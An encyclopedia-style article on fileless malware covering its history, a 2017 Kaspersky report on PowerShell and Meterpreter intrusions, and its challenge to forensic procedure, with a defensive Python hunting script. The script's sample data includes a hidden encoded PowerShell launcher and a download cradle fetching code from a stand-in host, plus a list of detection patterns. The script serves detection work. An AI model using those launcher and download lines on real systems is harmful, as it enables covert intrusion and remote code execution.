Fileless malware is a type of malicious software that resides only in a computer's volatile memory (RAM) rather than on its storage media.
It is very effective against existing computer-forensic and detection strategies that rely on file-based whitelisting, signature detection, hardware verification, pattern analysis, timestamping and the like, because it leaves very little evidence that a digital forensic investigation can use to identify unauthorized activity.
Its defining feature is that it is designed to run entirely in memory, so it survives only until the system is rebooted, unless it has arranged to be re-launched from a non-file location such as a registry value (discussed below).
Difference between fileless malware and in-memory malware
Fileless malware is sometimes treated as synonymous with in-memory malware. Both run in the same execution environment, system memory, but the critical difference is the way in which the infection is initiated and spread.
The infection path of most malware, including in-memory malware, requires writing to the hard disk in order to execute: the host's disk must be touched in some way.
This means that even if the stealthiest anti-forensic methods are employed, some residue of the unauthorized access remains on the host media.
Fileless malware, on the other hand, does not write its payload to disk as a file from the time of infection until the process is terminated (usually by a reboot). Instead it lives in process memory and, where persistence is needed, in places such as registry values. One caveat a practitioner should keep in mind: the registry is itself backed by hive files on disk, so a registry-resident launcher is "fileless" in the sense that it drops no executable or script file, not in the sense that nothing touches the disk; the hive and its transaction logs remain evidence that a forensic examiner can recover.
Fileless malware has evolved steadily, with each generation refining the technique toward clearly defined attack scenarios.
Its roots lie in early memory-resident viruses which, once started, stayed in memory and hooked a system interrupt in order to seize control flow, as seen in Frodo, Dark Avenger and Number of the Beast. These are generally regarded as the origin of fileless malware.
These techniques evolved into temporary memory-resident viruses, well-known examples being Anthrax and Monxla, and took on a more genuinely "fileless" character in network worms that injected themselves directly into memory, such as Code Red and SQL Slammer.
More modern examples include Stuxnet, Duqu, Poweliks and Phasebot.
On February 8, 2017, Kaspersky Lab’s Global Research and Analysis team published a report titled “Fileless attacks against Enterprise networks”.
The report states that this kind of malware, in its latest forms, had been found on 140 corporate networks worldwide, mainly at banks, telecom companies and government agencies.
In the case described, the attackers stored a PowerShell script in the Windows registry and used it to load the Meterpreter payload of the Metasploit attack framework directly into memory, together with supporting tools such as Mimikatz for credential theft; standard Windows utilities such as SC and NETSH were then used to assist lateral movement.
The intrusion was first detected when Meterpreter code was found running in the physical memory of a domain controller.
Kaspersky Lab is not alone in this: most of the major IT security and anti-malware companies, including Symantec, Trend Micro, McAfee Labs and Cybereason, have published similar findings.
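The registry-resident launcher pattern described above (a Run-key value that starts PowerShell hidden and pulls its real script from another registry value or from a URL, so that no script file ever touches disk) can be hunted for by decoding and scoring autorun values. The following is an added example, not code from the Kaspersky report or from any of the vendors named here; the registry entries, the second-stage script, the value names and the 203.0.113.5 address are all constructed for illustration.

```python
"""Hunt for registry-resident PowerShell launchers in Windows autorun values.
Added example with constructed data; not the scripts from any real campaign."""
import base64
import re


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects: base64 of the
    script encoded as UTF-16LE (launchers use it to hide keywords from grep)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical second-stage script as it might sit in another registry value:
# it reads a base64 payload from the registry and IEX's it purely in memory.
STAGE_SCRIPT = (
    "$p = (Get-ItemProperty 'HKCU:\\Software\\Classes\\CLSID\\Example').Payload; "
    "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"
)

# Constructed autorun entries: (key, value name, value data), in the shape
# Get-ItemProperty on the Run keys returns them.  Two benign, two suspicious.
SAMPLE_AUTORUNS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -nop -w hidden -enc " + encode_command(STAGE_SCRIPT)),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Loader",
     "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://203.0.113.5/a')\""),   # 203.0.113.0/24 is TEST-NET-3
]

# Indicators typical of in-memory PowerShell launchers (name -> regex).
INDICATORS = {
    "hidden window":              r"-w(?:indowstyle)?\s+hidden",
    "no profile":                 r"-nop(?:rofile)?\b",
    "execution policy bypass":    r"-(?:ep|executionpolicy)\s+bypass",
    "encoded command":            r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "reads script from registry": r"Get-ItemProperty|\bgp\s|HK(?:CU|LM):",
    "invoke-expression":          r"\biex\b|invoke-expression",
    "download cradle":            r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest",
    "in-memory loader":           r"\[Reflection\.Assembly\]::Load|VirtualAlloc|Marshal\]::Copy",
}


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -e/-ec/-enc/-EncodedCommand, or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:          # not valid base64, or not UTF-16LE text
        return None


def score_autorun(value_data: str) -> dict:
    """Decode any encoded command, then match the indicators against both the
    raw value and the decoded script, so encoding does not hide keywords."""
    decoded = decode_encoded_command(value_data)
    text = value_data + ("\n" + decoded if decoded else "")
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    return {"score": len(hits), "hits": hits, "decoded": decoded}


def hunt(autoruns, threshold: int = 2):
    """Return (key, name, result) for every entry scoring >= threshold."""
    flagged = []
    for key, name, data in autoruns:
        result = score_autorun(data)
        if result["score"] >= threshold:
            flagged.append((key, name, result))
    return flagged


if __name__ == "__main__":
    for key, name, result in hunt(SAMPLE_AUTORUNS):
        print(f"[!] {key}\\{name}: {', '.join(result['hits'])}")
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

On a real host the tuple list would be populated from the Run/RunOnce keys (and any other autostart location the hunt covers) rather than from the constructed sample; the scoring is deliberately simple so that the decoded second stage, not the regexes, is what the analyst reads.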
The emergence of fileless malware has become a major challenge for digital forensic investigations.
The ability to recover electronic residue from the scene is essential to maintaining chain of custody and producing evidence that is admissible in court.
Fileless malware therefore calls into question the standard operating procedures for digital forensic investigations and for how computers are handled at a crime scene.
In traditional forensic investigation methods, forensic teams work to rules such as the following.
- Do not turn the computer on under any circumstances.
- Make sure the computer is actually turned off. Some screen savers make it appear that the computer is off, while the activity lights on the hard drive or monitor show that the machine is still running.
- Disconnect the main battery from a laptop.
- Unplug the power supply and other devices from the sockets on the computer itself.
Fileless malware does not fit this workflow.
The evidence exists only in a memory image captured from the live, running system under investigation; powering the machine off destroys it.
If a traditional investigation were conducted against fileless malware, the volatile memory evidence would be lost, the legal substantiation would be compromised and the weight of the evidence presented would be reduced, making the "Trojan horse" or "someone else did it" defense more effective.
The inability of standard forensic techniques to cope with this type of malware makes it very attractive to adversaries who want to gain a foothold in a network and perform hard-to-track lateral movement quickly and quietly.